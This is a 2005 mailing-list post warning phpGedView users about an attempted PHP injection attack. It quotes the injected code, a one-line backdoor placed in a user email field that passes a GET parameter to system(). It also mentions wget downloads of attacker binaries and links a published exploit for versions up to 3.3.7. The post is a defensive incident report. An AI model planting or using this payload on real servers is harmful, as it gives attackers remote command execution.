[Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
[Phpgedview-talk] attack attempt
|
From: Matthew G. <ma...@po...> - 2005-12-20 19:31:56
|
Hi all,
I had a curious user request on my phpGedView site. Looks like they're=20
attempting some PHP injection style attack, using PHP code in the email=20
address and other field in the user table, like this:
\';error_reporting(0);if(isset($suntzu))
{system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
=46rom my log files it looks like the attacker was trying to download a lin=
ux=20
binary and a PHP script using wget. I grabbed the target files and can=20
provide a sample if anyone is interested in trying to un-pick what they do=
=20
(know a good linux dis-assembler?).
Doesn't look like they managed to do anything nasty, probably because wget=
=20
isn't available on my server. Just a heads up for everyone to keep an eye=
=20
out. Grep your logs for wget.
I reported the incident to SANS and they said they have seen it and sent me=
=20
this link, which looks like a published version of the exploit:
http://www.milw0rm.com/id.php?id=3D1379
=2E..which claims to affect versions <=3D 3.3.7. I'm using phpGedView v3.3=
=2E4=20
final, so I think I would have been infected if I had had wget installed. =
=20
Watch yourselves!
I'm guessing we need a patch of some sort.
Regards,
=2D-=20
Matthew
|
